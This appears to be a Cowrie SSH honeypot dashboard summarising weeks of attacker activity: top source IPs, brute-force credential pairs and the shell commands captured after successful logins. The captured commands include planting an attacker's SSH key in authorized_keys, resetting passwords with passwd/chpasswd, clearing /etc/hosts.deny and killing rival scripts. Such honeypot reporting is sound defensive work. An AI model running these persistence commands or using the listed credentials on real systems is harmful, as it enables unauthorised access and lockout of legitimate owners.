🍯 HONEYPOT DASHBOARD

COWRIE SSH HONEYPOT // LIVE ATTACKER INTELLIGENCE // Generated: 2026-06-11 07:29:29 BST
1538
Sessions Today
1575
Login Attempts Today
28
Successful Logins Today
125
Unique IPs Today
148
Commands Today

🌍 Attack Origins

πŸ† Top Attackers

AttackerOriginISPAttempts
wraith_root
10.0.28.1
🏴 Unknown Unknown 112728
yankee_sol
32.216.51.211
πŸ‡ΊπŸ‡Έ Stratford Frontier Communications Solutions 18447
cowboy_root
38.145.208.140
πŸ‡ΊπŸ‡Έ Redondo Beach Enzu Inc 8862
specter
87.251.64.176
πŸ‡΅πŸ‡± Warsaw ISAEV Igor 3815
beefeater_sol
2.57.121.25
πŸ‡¬πŸ‡§ Rushden Unmanaged LTD 3181
beefeater_sol_2
2.57.121.112
πŸ‡¬πŸ‡§ Rushden Unmanaged LTD 3120
rogue_sol
193.24.211.100
πŸ‡­πŸ‡° Central Data Campus Limited 3000
strudel_root
213.209.159.56
πŸ‡©πŸ‡ͺ Augsburg Feo Prest SRL 2752
gouda_sol
45.156.87.147
πŸ‡³πŸ‡± Eygelshoven Pfcloud UG (haftungsbeschrankt) 2311
bike_sol
176.65.132.129
πŸ‡³πŸ‡± Eygelshoven Pfcloud UG (haftungsbeschrankt) 2055

πŸ“‘ Recent Activity

2026-06-11 07:28:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:28:01 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:27:20 wraith_root_49 156.245.246.50 Login attempt: ctadmin/ctadmin
2026-06-11 07:27:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:27:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:26:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:26:01 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:25:29 wraith_root_49 156.245.246.50 Login attempt: root/Ali123
2026-06-11 07:25:04 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:25:03 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:24:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:24:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:23:35 wraith_root_49 156.245.246.50 Login attempt: alex/1qazXSW@
2026-06-11 07:23:04 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:23:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:22:03 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:22:02 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:21:37 wraith_root_49 156.245.246.50 Login attempt: mqtt/123
2026-06-11 07:21:05 wraith_root 10.0.28.1 Login attempt: root/
2026-06-11 07:21:03 wraith_root 10.0.28.1 Login attempt: root/

🎬 Greatest Hits

🏴 wraith_root
112728 attempts Β· 1 sessions Β· 2 cmds
In and out in seconds. Just checking if anyone's home.
⏰ 05-03 19:28 – 06-11 02:28
πŸ‡ΊπŸ‡Έ yankee_sol
18447 attempts Β· 1 sessions Β· 1 cmds
Brief visit. Ran a command or two and bounced.
⏰ 05:33–14:37
πŸ‡ΊπŸ‡Έ cowboy_root
8862 attempts Β· 6 sessions Β· 6 cmds
Automated fingerprinting β€” this box got sized up in seconds.
⏰ 05-07 13:41 – 05-08 04:01
πŸ‡΅πŸ‡± specter
3815 attempts
Brute-force scanner (mixed credentials). 3815 attempts with combos like support:support, support:support, support:support, support:support, support:support.
⏰ 05-04 00:38 – 06-11 01:30
πŸ‡¬πŸ‡§ beefeater_sol
3181 attempts
Brute-force scanner (mixed credentials). 2611 attempts with combos like user:131085, user:13101981, user:13101980, user:130790, user:13051978.
⏰ 05-03 19:55 – 06-10 12:41
πŸ‡¬πŸ‡§ beefeater_sol_2
3120 attempts
Brute-force scanner (mixed credentials). 3120 attempts with combos like admin:11041995, admin:110378, admin:110376, admin:110294, admin:110275.
⏰ 05-03 19:39 – 06-11 01:44

πŸ”‘ Top Credentials

πŸ“ˆ Attack Timeline

πŸ“Š Daily Breakdown

DateSessionsLogin AttemptsSuccessfulUnique IPsCommandsTop Attacker
2026-06-11 1538 1575 28 125 148 wraith_root (10.0.28.1)
2026-06-10 8158 8285 70 245 1099 wraith_root (10.0.28.1)
2026-06-09 5353 5607 66 290 966 wraith_root (10.0.28.1)
2026-06-08 7350 7689 95 326 1138 wraith_root (10.0.28.1)
2026-06-07 7667 8073 65 289 585 wraith_root (10.0.28.1)
2026-06-06 6033 6531 57 282 878 wraith_root (10.0.28.1)
2026-06-05 7407 7895 63 264 661 wraith_root (10.0.28.1)
2026-06-04 7014 7637 73 310 653 wraith_root (10.0.28.1)
2026-06-03 6716 6914 97 266 1027 wraith_root (10.0.28.1)
2026-06-02 5570 5628 57 232 705 wraith_root (10.0.28.1)
2026-06-01 7385 7599 363 276 1294 wraith_root (10.0.28.1)
2026-05-31 4986 5772 141 320 1319 wraith_root (10.0.28.1)
2026-05-30 6399 6685 150 290 1421 wraith_root (10.0.28.1)
2026-05-29 3974 4209 119 239 1023 wraith_root (10.0.28.1)
2026-05-28 5492 6008 206 379 2741 wraith_root (10.0.28.1)
2026-05-27 5213 5661 137 339 1379 wraith_root (10.0.28.1)
2026-05-26 23350 23372 47 155 551 yankee_sol (32.216.51.211)
2026-05-25 6582 6437 223 284 2408 wraith_root (10.0.28.1)
2026-05-24 7898 7696 222 391 2293 wraith_root (10.0.28.1)
2026-05-23 7381 7314 227 367 2462 wraith_root (10.0.28.1)
2026-05-22 7501 7391 193 362 2426 wraith_root (10.0.28.1)
2026-05-21 5978 6728 192 409 1370 wraith_root (10.0.28.1)
2026-05-20 6151 7154 149 441 1332 wraith_root (10.0.28.1)
2026-05-19 6062 7130 143 540 1556 wraith_root (10.0.28.1)
2026-05-18 7252 8715 152 461 2386 wraith_root (10.0.28.1)
2026-05-17 7810 8625 141 349 2174 wraith_root (10.0.28.1)
2026-05-16 8296 8891 170 319 549 wraith_root (10.0.28.1)
2026-05-15 6341 7365 139 364 981 wraith_root (10.0.28.1)
2026-05-14 5334 6567 115 401 1376 wraith_root (10.0.28.1)
2026-05-13 5560 6183 96 404 1557 wraith_root (10.0.28.1)
2026-05-12 5465 5411 63 468 684 wraith_root (10.0.28.1)
2026-05-11 7027 7492 55 457 453 wraith_root (10.0.28.1)
2026-05-10 6689 7659 54 421 679 wraith_root (10.0.28.1)
2026-05-09 6082 6834 80 407 897 wraith_root (10.0.28.1)
2026-05-08 7901 7840 100 450 783 wraith_root (10.0.28.1)
2026-05-07 13440 13370 268 292 1095 cowboy_root (38.145.208.140)
2026-05-06 6261 6278 343 304 1388 wraith_root (10.0.28.1)
2026-05-05 4704 5070 65 186 620 wraith_root (10.0.28.1)
2026-05-04 5525 5547 79 131 647 wraith_root (10.0.28.1)

πŸ“Š All-Time Stats

7354.8
Attacks / Day
117
Countries Seen
19:00–20:00
Peak Hour (ET)
05-26
Busiest Day (23372 attempts)
286,837 total attempts across 39 days Β· 1.8% success rate

πŸ’€ Successful Logins β€” What They Did

🎭 shadow_root_23 (187.191.48.24) β€” Tijuana, Mexico Β· 3 sessions Β· 3 cmds
2026-05-21 13:18 EDT Β· as root/Swissmp@@@, root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 wraith_root_3 (187.190.35.163) β€” Gustavo Adolfo Madero, Mexico Β· 5 sessions Β· 5 cmds
2026-05-06 08:53 EDT Β· as root/Cryptolendify%123, root/blackcat
Ran uname 5x across 5 sessions β€” automated OS fingerprinting.
$ uname -a Γ—5 // OS/kernel identification
🎭 rogue_root_26 (200.54.96.2) β€” Providencia, Chile Β· 3 sessions Β· 3 cmds
2026-05-21 06:36 EDT Β· as root/blackcat, root/swissmp_321
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 ghost_root_28 (187.191.48.23) β€” Tijuana, Mexico Β· 2 sessions Β· 2 cmds
2026-05-21 13:13 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 specter_root_25 (187.191.48.5) β€” Tijuana, Mexico Β· 3 sessions Β· 3 cmds
2026-05-21 07:41 EDT Β· as root/blackcat, root/swissmp!
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 abba_root (20.240.241.205) β€” GΓ€vle, Sweden Β· 5 sessions Β· 5 cmds
2026-05-06 13:59 EDT Β· as root/blackcat, root/mail112233
Ran uname 5x across 5 sessions β€” automated OS fingerprinting.
$ uname -a Γ—5 // OS/kernel identification
🎭 kimchi_root_3 (61.79.189.2) β€” Yongin-si, South Korea Β· 4 sessions Β· 4 cmds
2026-05-06 07:21 EDT Β· as root/Mail@3132, root/blackcat
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 wraith_root_28 (189.203.190.153) β€” Benito Juarez, Mexico Β· 3 sessions Β· 3 cmds
2026-05-21 11:38 EDT Β· as root/blackcat, root/swissmp@#2024@
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—3 // OS/kernel identification
🎭 silk_root_5 (139.159.181.204) β€” Guangzhou, China Β· 1 session Β· 1 cmd
2026-06-11 01:33 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith_root_29 (125.212.244.35) β€” Ho Chi Minh City, Vietnam Β· 4 sessions Β· 4 cmds
2026-05-06 07:52 EDT Β· as root/blackcat, root/mail123456
Ran uname 4x across 4 sessions β€” automated OS fingerprinting.
$ uname -a Γ—4 // OS/kernel identification
🎭 burger_root_22 (104.243.133.18) β€” Los Angeles, United States Β· 2 sessions Β· 2 cmds
2026-05-21 10:43 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 panda_root (61.51.111.26) β€” Jinrongjie, China Β· 1 session Β· 1 cmd
2026-06-11 01:28 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 dutch_sol_8 (80.94.92.186) β€” Amsterdam, The Netherlands Β· 2 sessions Β· 2 cmds
2026-06-10 22:54 EDT Β· as sol/sol
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ /bin/./uname -s -v -n -r -m Γ—2 // obfuscated system check
🎭 rogue_root_27 (103.239.165.114) β€” Palembang, Indonesia Β· 5 sessions Β· 5 cmds
2026-05-06 13:46 EDT Β· as root/Mail.2023, root/blackcat
Ran uname 5x across 5 sessions β€” automated OS fingerprinting.
$ uname -a Γ—5 // OS/kernel identification
🎭 toucan_root_4 (45.164.251.67) β€” GoiΓ’nia, Brazil Β· 2 sessions Β· 2 cmds
2026-05-21 11:00 EDT Β· as root/blackcat
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a Γ—2 // OS/kernel identification
🎭 autobahn (84.46.247.185) β€” Berlin, Germany Β· 2 sessions Β· 40 cmds
2026-06-10 20:58 EDT Β· as general/123456, mmp/mmp123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "mmp123\nr1LVqQnNSN6A\nr1LVqQnNSN6A"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "mmp123\nr1LVqQnNSN6A\nr1LVqQnNSN6A\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "123456\nPrIOMxViAhZG\nPrIOMxViAhZG"|passwd|bash
$ echo "123456\nPrIOMxViAhZG\nPrIOMxViAhZG\n"|passwd
🎭 chai_root_7 (66.116.224.143) β€” Mumbai, India Β· 1 session Β· 20 cmds
2026-06-10 21:02 EDT Β· as mikeb/mikeb
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "mikeb\nxmOkXZKVroRZ\nxmOkXZKVroRZ"|passwd|bash
$ Enter new UNIX password:
$ echo "mikeb\nxmOkXZKVroRZ\nxmOkXZKVroRZ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_2 (152.53.0.56) β€” Vienna, Austria Β· 2 sessions Β· 40 cmds
2026-06-10 20:57 EDT Β· as general/123456, mmp/mmp123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123456\nziKGIt643qjg\nziKGIt643qjg"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123456\nziKGIt643qjg\nziKGIt643qjg\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "mmp123\nNWhw0mrDwnqW\nNWhw0mrDwnqW"|passwd|bash
$ echo "mmp123\nNWhw0mrDwnqW\nNWhw0mrDwnqW\n"|passwd
🎭 rogue (52.169.217.131) β€” Dublin, Ireland Β· 1 session Β· 20 cmds
2026-06-10 20:55 EDT Β· as runner/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nHjlGxPfxwPKN\nHjlGxPfxwPKN"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nHjlGxPfxwPKN\nHjlGxPfxwPKN\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 pretzel_root_6 (87.106.210.86) β€” Berlin, Germany Β· 1 session Β· 1 cmd
2026-06-10 20:10 EDT Β· as root/swissmp#12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 liberty_root_16 (50.46.141.125) β€” Kirkland, United States Β· 1 session Β· 1 cmd
2026-06-10 19:47 EDT Β· as root/12345678
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ w; uname -a;
🎭 lantern_root_3 (180.76.137.24) β€” Beijing, China Β· 1 session Β· 10 cmds
2026-06-10 19:14 EDT Β· as root/password1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:TntWjXzkA7aE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
🎭 rogue_root_28 (213.230.127.104) β€” Tashkent, Uzbekistan Β· 1 session Β· 19 cmds
2026-06-10 18:55 EDT Β· as root/Q2w3e4r5
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Qgbcjiyd8Rgj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 autobahn_2 (78.46.211.133) β€” Falkenstein, Germany Β· 1 session Β· 20 cmds
2026-06-10 18:48 EDT Β· as duck/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nmAn0izia0qmt\nmAn0izia0qmt"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nmAn0izia0qmt\nmAn0izia0qmt\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 gouda_sol (45.156.87.147) β€” Eygelshoven, Netherlands Β· 3 sessions Β· 3 cmds
2026-06-01 11:36 EDT Β· as bob/1234, dev/123456, root/root@2026
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—3
🎭 crepe_root_6 (173.212.248.253) β€” Lauterbourg, France Β· 1 session Β· 1 cmd
2026-06-10 18:33 EDT Β· as root/swissmp123456
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 rogue_root_29 (172.188.89.41) β€” Singapore, Singapore Β· 1 session Β· 1 cmd
2026-06-10 18:10 EDT Β· as root/Swissmp
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 wraith (90.162.116.66) β€” Valencia, Spain Β· 1 session Β· 1 cmd
2026-06-10 17:44 EDT Β· as jimster/jimster123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -a // OS/kernel identification
🎭 jade_root_2 (59.47.131.34) β€” Benxi, China Β· 1 session Β· 1 cmd
2026-06-10 17:44 EDT Β· as root/---fuck_you----
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ uname -s -m
🎭 seoul_root_6 (112.217.188.122) β€” Yongin-si, South Korea Β· 1 session Β· 19 cmds
2026-06-10 16:58 EDT Β· as root/4rfv$RFV4rfv
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:I1ph8bYpO5Jc"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_26 (182.180.154.234) β€” Lahore, Pakistan Β· 3 sessions Β· 59 cmds
2026-06-10 13:37 EDT Β· as action/action, bitrix/1q2w3e4r, root/!Q@W#E$R1q2w3e4r
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
